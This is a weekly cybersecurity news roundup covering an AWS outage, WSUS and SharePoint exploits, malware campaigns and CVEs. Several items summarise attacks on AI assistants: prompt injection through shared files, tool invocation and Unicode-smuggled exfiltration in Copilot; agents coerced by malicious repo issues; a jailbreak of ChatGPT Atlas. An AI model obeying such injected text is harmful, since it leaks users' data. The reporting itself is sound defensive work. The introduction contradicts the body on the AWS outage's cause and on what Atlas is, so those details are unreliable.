Welcome to this week’s edition of the Cybersecurity Newsletter, where we dissect the latest threats, vulnerabilities, and disruptions shaping the digital landscape.

As organizations navigate an increasingly complex threat environment, staying ahead of emerging risks has never been more critical.

This week, we’re zeroing in on major incidents that underscore the fragility of cloud infrastructure, legacy update systems, and everyday browsing tools—from widespread service interruptions to sophisticated exploitation chains.

Leading the headlines is the recent AWS outage that rippled across global services, leaving businesses scrambling. On October 20, 2025, a configuration error in Amazon Web Services’ US-East-1 region triggered a cascade failure, impacting everything from e-commerce platforms to streaming services.

Reports indicate over 12 hours of downtime for key APIs, with cascading effects on dependent services like Netflix and Slack. While AWS cited a “networking misconfiguration” as the root cause, experts warn this highlights ongoing challenges in multi-region redundancy and automated failover mechanisms.

In our deep dive, we explore the technical fallout, affected sectors, and best practices for building resilient cloud architectures to mitigate similar disruptions.

Shifting to exploitation tactics, attackers are ramping up abuse of Windows Server Update Services (WSUS), Microsoft’s long-standing patch management framework. Security firm Mandiant disclosed a new campaign where threat actors leverage WSUS to deploy malware via tampered updates, bypassing endpoint detection.

This WSUS exploitation technique, tracked as a variant of the “Living off the Land” strategy, has hit enterprises in finance and healthcare, with initial infections traced to phishing lures. CVEs like CVE-2025-29876 enable remote code execution if servers aren’t hardened. We’ll break down the attack vector, indicators of compromise, and hardening steps, including segmenting update servers and enabling WSUS signing enforcement.

Finally, browser and AI security take center stage with flaws in Google Chrome and OpenAI’s ChatGPT Atlas plugin. Chrome’s CVE-2025-47219, a high-severity type confusion bug in the V8 engine, allows sandbox escapes and has been actively exploited in the wild, per Google’s advisory.

Meanwhile, ChatGPT’s Atlas, a mapping tool for threat intelligence, suffers from an API key exposure flaw (CVE-2025-31942) that could leak user data. These vulnerabilities remind us that even cutting-edge tools aren’t immune. Our analysis covers patch timelines, zero-day risks, and tips for secure browser extensions.

Threats

Malicious WhatsApp Extensions in Chrome Store

Cybersecurity researchers identified 131 fraudulent Chrome extensions posing as WhatsApp Web automation tools, all sharing the same codebase to enable unauthorized bulk messaging and scheduling. These extensions inject scripts into WhatsApp’s interface, bypassing rate limits and anti-spam measures while exploiting Manifest V3 for background operations. Marketed to small businesses in regions like Brazil, they use remote configurations for dynamic updates and employ evasion tactics such as randomized sends and periodic syncs to persist despite policy violations. The campaign operates via a reseller model, with all extensions still active as of mid-October 2025.​

Read more: https://cybersecuritynews.com/131-malicious-extensions-targeting-whatsapp/

GlassWorm Malware Targets VS Code Extensions

A new self-propagating malware called GlassWorm has compromised over 35,800 VS Code extension installations on the OpenVSX Marketplace by hiding malicious code with invisible Unicode characters. Initially detected in the “CodeJoy” extension, it steals credentials from platforms like npm, GitHub, and 49 cryptocurrency wallets, then hijacks more extensions to spread. The campaign uses Solana blockchain for resilient C2 infrastructure, with fallbacks like Google Calendar, allowing real-time adaptations. This technique evades visual reviews and static analysis, turning infected devices into proxy nodes for further attacks.​

Read more: https://cybersecuritynews.com/new-glassworm-using-invisible-code/

Salt Typhoon Exploits Zero-Day Vulnerabilities

China-linked APT group Salt Typhoon has conducted intrusions leveraging zero-day flaws, including a Citrix vulnerability, targeting telecommunications providers in Europe and the US. The group, attributed to China’s Ministry of State Security, uses supply chain compromises and unpatched weaknesses like ProxyLogon to infiltrate networks, enabling lateral movement and data exfiltration from critical infrastructure. Attacks involve custom tools for privilege escalation and stealth persistence, compromising entities across 12 sectors with stolen configuration files and credentials. Many exploited CVEs, such as those in Ivanti and Fortinet, remain unpatched in high percentages of environments.​

Read more: https://cybersecuritynews.com/salt-typhoon-using-zero-day/

Rust-Based ChaosBot Malware Emerges

A new Rust-written backdoor named ChaosBot is targeting corporate networks via phishing with malicious LNK files, using Discord for covert C2 communications. It masquerades as Microsoft Edge processes, abuses service accounts for persistence, and includes anti-VM checks like VMware detection to evade analysis. Deployed through compromised credentials and WMI execution, ChaosBot enables reconnaissance, command execution, and data exfiltration while blending traffic with legitimate Discord activity. Its lightweight design and ETW patching make it resilient against endpoint protections.​

Read more: https://cybersecuritynews.com/new-rust-based-chaosbot-malware/

Rise of Stealer Malware Campaigns

Threat actors are increasingly deploying info-stealer malwares like Stealerium, Lumma, and Atomic to harvest credentials from browsers, wallets, and apps at scale. Open-source variants such as Stealerium and Phantom allow opportunistic cybercriminals to modify and distribute payloads, targeting both Windows and macOS with techniques like AppleScript for data extraction. These stealers facilitate identity theft for ransomware or further attacks, with campaigns surging in 2025 via GitHub downloads and MaaS models. Adversaries sell captured data on underground markets, emphasizing the need for robust endpoint monitoring.​

Read more: https://cybersecuritynews.com/threat-actors-with-stealer-malwares/

Advanced Email Phishing Techniques Proliferate

Cybercriminals are enhancing email phishing with QR codes in PDFs, password-protected attachments, and revived calendar invites to bypass filters and mobile security gaps. These multi-stage attacks use trusted file-sharing services and live API calls to harvest credentials, often mimicking secure communications from brands. In 2025, tactics like Axios abuse for session hijacking and deepfakes have boosted success rates by 241%, targeting remote workers and executives. AI-driven personalization scales these threats, combining email with voice and video for convincing social engineering.​

Read more: https://cybersecuritynews.com/threat-actors-advancing-email-phishing-attacks/

SideWinder APT Deploys ClickOnce Malware

India-linked SideWinder APT group has launched a phishing campaign using malicious PDFs and ClickOnce apps to deploy StealerBot espionage malware against South Asian diplomatic targets. The infection chain abuses signed MagTek applications for DLL sideloading, leading to fileless payloads via process injection and geofenced delivery. Evolving from Word docs to this PDF/ClickOnce method, it includes dynamic URLs and brief payload windows to hinder analysis. The malware focuses on credential theft and intelligence gathering in sectors like government and maritime.​

Read more: https://cybersecuritynews.com/sidewinder-hacking-group-uses-clickonce-based-infection-chain/

Cyber Attacks

RDP Services Targeted by Massive Botnet

A coordinated botnet campaign has been exploiting Microsoft Remote Desktop Protocol services using over 30,000 new IP addresses daily to probe for timing-based vulnerabilities in RD Web Access and RDP web client authentication. Since September 2025, unique IPs have exceeded 500,000, with a focus on U.S. systems and origins primarily from Brazil, Argentina, and Mexico. Traditional IP blocking proves ineffective against this rapidly rotating infrastructure, emphasizing the need for advanced detection of anomalous RDP probes.​

Read more: https://cybersecuritynews.com/rdp-services-under-attack/

ASP.NET Machine Keys Abused in IIS Attacks

Threat actors, tracked as REF3927, are leveraging publicly exposed ASP.NET machine keys from Microsoft documentation and forums to forge malicious ViewState payloads, enabling remote code execution on vulnerable Windows IIS servers. Once inside, attackers deploy the Z-Godzilla webshell for command execution and credential theft, followed by the TOLLBOOTH module to manipulate search engine rankings for SEO fraud via keyword-stuffed pages served to bots. Reinfection remains common due to unchanged keys post-cleanup, affecting servers globally except in China.​

Read more: https://cybersecuritynews.com/hackers-abuse-asp-machine-keys-iis/

ToolShell Vulnerability Exploits SharePoint Servers

China-based threat actors are actively exploiting the critical ToolShell vulnerability chain in Microsoft SharePoint, combining CVE-2025-53770 (RCE, CVSS 9.8) and CVE-2025-53771 (spoofing) to deploy stealthy webshells without authentication. Attacks target on-premises SharePoint 2016, 2019, and Subscription Edition, bypassing MFA and granting access to integrated services like Teams and OneDrive, with victims including U.S. agencies and energy firms. Patching requires key rotation and IIS restarts, as over 400 systems have been compromised since July 2025.​

Read more: https://cybersecuritynews.com/toolshell-vulnerability-compromise-networks/

Adobe Magento RCE Flaw Under Active Exploitation

Hackers are exploiting a critical remote code execution vulnerability in Adobe Commerce and Magento platforms (CVSS 9.8), allowing file reads and JavaScript injection via API modifications to steal customer data and payment details. The CosmicSting flaw (CVE-2024-34102) affects versions up to 2.4.7, with attackers compromising 3-5 sites hourly using stolen encryption keys from env.php to craft JWT tokens. Combined with CVE-2024-2961, it enables server-side code execution, urging immediate updates for e-commerce sites.​

Read more: https://cybersecuritynews.com/adobe-magento-rce-vulnerability-exploited/

Microsoft 365 Exchange Direct Send Abused for Phishing

Attackers are misusing Microsoft 365’s Exchange Online Direct Send feature to bypass anti-spam filters and deliver spoofed emails from multifunction devices and legacy apps, facilitating phishing without account compromise. This method allows internal user impersonation and payload delivery, evading rigorous authentication checks inherent to standard SMTP relays. Organizations must monitor and restrict Direct Send usage to prevent widespread credential theft campaigns.​

Read more: https://cybersecuritynews.com/hackers-abuse-microsoft-365-exchange-direct-send/

Azure Blob Storage Under Threat Actor Siege

Threat actors are using compromised credentials to infiltrate misconfigured Azure Blob Storage accounts, establishing persistence for data exfiltration targeting intellectual property across organizational repositories. This campaign exploits weak access controls to host phishing sites mimicking Office 365 logins and aid forensic evasion in broader attacks. Immediate reviews of storage permissions and logging enablement are critical to counter this growing cloud misconfiguration risk.​

Read more: https://cybersecuritynews.com/threat-actors-attacking-azure-blob-storage/

RedTiger Tool Repurposed for Gaming Attacks

The open-source red teaming tool RedTiger is being weaponized against gamers and Discord users, spreading via malicious links in gaming communities to steal accounts and deploy info-stealers. Originally designed for penetration testing, its evasion capabilities make it ideal for targeting high-value social engineering vectors in entertainment sectors. Detection focuses on anomalous tool deployments outside authorized red team exercises.​

Read more: https://cybersecuritynews.com/red-teaming-tool-redtiger/

WSUS RCE Vulnerability Faces Active Exploits

CISA warns of ongoing exploitation of a critical remote code execution flaw in Windows Server Update Services (WSUS), allowing unauthenticated attackers to execute arbitrary code on domain controllers via crafted update requests. PoC exploits have been released, heightening risks for unpatched environments, with Microsoft issuing an out-of-band patch. Federal agencies must apply updates immediately per KEV catalog addition.​

Read more: https://cybersecuritynews.com/wsus-rce-vulnerability-exploited/

YouTube Ghost Network Spreads Malware

The “YouTube Ghost” malware network has hijacked over 3,000 channels to distribute info-stealers through videos promoting pirated software and game cheats, luring downloads of malicious payloads. This operation exploits YouTube’s vast reach for mass distribution, evading moderation by rotating compromised accounts. Users should verify download sources and enable two-factor authentication on linked services.​

Read more: https://cybersecuritynews.com/youtube-ghost-malware-network/

LockBit 5.0 Ransomware Resurges Aggressively

LockBit 5.0 is actively targeting Windows, Linux, and ESXi environments with enhanced evasion tactics post-Operation Cronos, focusing on critical infrastructure for double-extortion via data leaks. The variant incorporates AI-driven encryption and multi-platform support, challenging previous dominance by groups like ShinySp1d3r in Q3 2025. Backup isolation and endpoint segmentation are essential defenses against this evolving threat.​

Vulnerabilities

WSUS RCE Vulnerability PoC Released

A proof-of-concept exploit has emerged for CVE-2025-59287, a critical flaw in Microsoft’s Windows Server Update Services enabling unauthenticated remote code execution with SYSTEM privileges. The vulnerability arises from unsafe deserialization in the AuthorizationCookie handling, affecting all supported Windows Server versions from 2012 to 2025, and carries a CVSS v3.1 score of 9.8. Microsoft disclosed it during October 2025 Patch Tuesday, noting its wormable potential across networked servers, with no in-the-wild exploits reported yet but urgent patching recommended to prevent supply-chain attacks via malicious updates. Organizations should apply security updates immediately, isolate WSUS servers with firewalls, and consider migrating from the deprecated BinaryFormatter serializer.​ Read more

LANSCOPE Endpoint Manager RCE Flaw

Motex revealed CVE-2025-61932, a remote code execution vulnerability in LANSCOPE Endpoint Manager On-Premise Edition versions up to 9.4.7.1, scored at CVSS 3.0 9.8, allowing attackers to compromise endpoint devices without privileges or interaction. Active exploitation has been confirmed through malicious packets targeting client programs and detection agents, though the cloud edition remains unaffected. The flaw highlights risks in on-premise tools running with elevated privileges, potentially enabling malware deployment or network pivoting in hybrid environments. Motex urges immediate client-side patching via their portal, with no central manager updates needed.​ Read more

Copilot Prompt Injection Vulnerability

Microsoft 365 Copilot faces a prompt injection flaw that enables attackers to steal sensitive tenant data, including recent documents and emails, through malicious content in shared files or emails. The exploit combines prompt injection with automatic tool invocation and ASCII smuggling to hide exfiltrated information in invisible Unicode characters within hyperlinks, bypassing user awareness. Patched following January 2024 disclosure, the vulnerability affected data retrieval like Slack MFA codes or sales figures, underscoring risks in AI assistants processing untrusted inputs. Organizations should enforce strict content validation and monitor for anomalous AI interactions to prevent similar chains.​ Read more

Chrome V8 Engine Vulnerability

Google addressed a high-severity flaw in Chrome’s V8 JavaScript engine via an emergency update, preventing potential crashes or code execution through type confusion or memory corruption exploits. Tracked under recent CVEs like CVE-2025-5419, the issue stems from improper handling in the engine’s optimization processes, actively targeted in zero-click attacks. The update, version 129.0.6668.100 or later, mitigates risks for billions of users, with CISA warning of ongoing exploitation. Users must update browsers immediately and enable auto-updates to counter these engine-level threats.​ Read more

Multiple GitLab Security Vulnerabilities

GitLab patched several high-severity flaws, including DoS vectors and authorization bypasses, allowing attackers to crash instances, inject CI/CD jobs, or takeover accounts via XSS in search and snippet features. Vulnerabilities like CVE-2025-4278 (CVSS 8.7) and CVE-2025-5121 (CVSS 8.5) affect versions up to 18.0.2, impacting source code repositories and pipelines in self-managed setups. Emergency releases 18.0.2, 17.11.4, and 17.10.8 address HTML injection, infinite redirects, and unbounded token issues, with no widespread breaches noted. Administrators should upgrade promptly and review SAML configurations for added protection.​ Read more

MCP Server Platform Vulnerability

A critical issue in the MCP Server Platform from Smithery.ai exposes AI model registries to unauthorized access and potential data leaks, with attackers able to manipulate context protocols in deployed models. The flaw, affecting integrations in coding agents and IDEs, enables prompt injections via malicious issues in public repos, coercing AI to leak private data without direct compromises. Over 14,000 GitHub stars highlight its adoption, amplifying risks for development workflows. Developers should scan for toxic agent flows, restrict external data sources, and apply updates to mitigate these supply-chain vectors.​ Read more

BIND 9 Vulnerabilities Enabling DoS

Multiple flaws in BIND 9 DNS resolvers, including CVE-2025-40775 (CVSS 7.5), allow remote DoS via invalid TSIG handling or cache poisoning, crashing servers with single packets or floods. Affecting versions 9.20.0-9.20.8 and 9.21.0-9.21.7, over 706,000 instances remain vulnerable, disrupting internet infrastructure. Patches in 9.18.37, 9.20.9, and 9.21.8 fix assertion failures and memory exhaustion, with no workarounds available. Network admins must update urgently and monitor for anomalous DNS traffic to maintain resolver stability. Read more

TARmageddon Vulnerability in Rust Library

The TARmageddon flaw (CVE undisclosed) in async-tar and tokio-tar Rust crates enables attackers to replace config files or execute remote code by exploiting path traversal during archive extraction. Affecting millions of downloads in async applications, the issue allows symlink following without checks, leading to arbitrary writes in supply-chain scenarios. No active exploits reported, but its presence in popular forks urges immediate upgrades to patched versions. Rust developers should validate paths strictly and audit dependencies for similar extraction risks.​ Read more

Decoding PIN-Protected BitLocker

Researchers demonstrated decoding PIN-protected BitLocker drives via TPM SPI bus interception, extracting keys even with physical access protections in place. The technique analyzes serial peripheral interface communications on laptops, bypassing software locks to mount encrypted volumes without passwords. Applicable to Windows devices using TPM 2.0, it reveals hardware-level weaknesses in full-disk encryption. Users should enable multi-factor recovery options and secure physical access to mitigate such forensic attacks.​ Read more

ChatGPT Atlas Browser Jailbroken

OpenAI’s ChatGPT Atlas browser, integrating AI for web tasks, has been jailbroken to disguise malicious activities as legitimate navigation, allowing hidden data exfiltration or script execution. The flaw exploits the browser’s agentic features, enabling attackers to override safeguards and perform unauthorized actions under AI assistance. Launched recently, it affects early adopters using the tool for automated browsing. OpenAI recommends limiting extensions and monitoring AI prompts to prevent jailbreak escalations in hybrid AI-web environments.​ Read more

Tech News​

AWS Outage Disrupts Global Services

A widespread Amazon Web Services (AWS) outage struck on Monday, impacting millions of users and services including Amazon’s e-commerce site, Snapchat, Prime Video, Canva, Capital One banking, Delta Airlines, and DoorDash delivery. The incident originated from a DNS failure within AWS’s DynamoDB NoSQL database, preventing address resolution and causing cascading operational halts across dependent platforms. AWS engineers restored partial services by early afternoon, with no cyberattack suspected and a root-cause analysis promised; this event highlights the risks of single-provider dependency in cloud infrastructure.​ Read more

Automatic BitLocker Encryption Locks User Data

A Reddit user reported that reinstalling Windows 11 unexpectedly enabled BitLocker encryption on two backup drives, locking 3TB of irreplaceable data without prior configuration or recovery keys. This silent activation in Windows 11 Pro and Enterprise editions, particularly version 24H2, triggers on hardware like TPM 2.0 and Secure Boot during clean installs, affecting non-boot storage less commonly documented. Recovery attempts failed, leading to data loss after formatting; experts recommend disabling BitLocker via registry tweaks or tools like Rufus during installation and always backing up keys to Microsoft accounts.​ Read more

Windows Updates Trigger Login Failures

Microsoft confirmed that security updates released on and after August 29, 2025, are causing Kerberos and NTLM authentication failures on Windows 11 24H2, 25H2, and Windows Server 2025 devices with duplicate Security Identifiers (SIDs). These issues arise from enhanced SID checks blocking authentication on cloned systems not prepared via Sysprep, resulting in symptoms like failed logins, remote desktop errors, and “access denied” messages. Administrators should rebuild affected systems using supported cloning methods or contact Microsoft Support for a temporary Group Policy workaround to restore access.​ Read more

Critical Vulnerabilities in Oracle VM VirtualBox

Oracle disclosed multiple high-severity vulnerabilities in VM VirtualBox versions 7.1.12 and 7.2.2, tracked under CVEs like CVE-2025-62587 to CVE-2025-62590 and CVE-2025-62641, each scoring 8.2 on CVSS 3.1. These Core component flaws allow local high-privileged attackers to compromise confidentiality, integrity, and availability, potentially enabling full takeover of the virtualization environment and exposure of virtual machine data. Patched in the October 2025 Critical Patch Update, users must update immediately, restrict access, and monitor for unusual activity to mitigate risks in development and enterprise setups.​ Read more

Microsoft Disables File Previews for Security

As part of October 2025 security updates, Microsoft automatically disables the File Explorer preview pane for internet-downloaded files marked with the “Mark of the Web” to prevent NTLM hash theft attacks via malicious HTML elements. This change blocks threat actors from harvesting credentials when users simply preview files containing tags like <link> or <src> that reference attacker-controlled servers, a common vector in phishing campaigns. Trusted files can be unblocked via Properties, but the default protection enhances security without user intervention on Windows 11 and Server systems.​ Read more

Teams Introduces Auto Work Location Detection

Microsoft Teams is rolling out an opt-in feature in December 2025 to automatically detect and set users’ work locations based on connections to organizational Wi-Fi networks or desk peripherals like monitors. Enabled via PowerShell policy by admins, it updates locations to “In the Office” or specific buildings during set work hours from Outlook, requiring user consent and location sharing permissions for privacy. This aims to improve hybrid collaboration by syncing real-time presence, though it raises concerns over telemetry data and tracking in shared environments.​ Read more

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post Cybersecurity Newsletter Weekly – AWS Outage, WSUS Exploitation, Chrome Flaws, and RDP Attacks appeared first on Cyber Security News.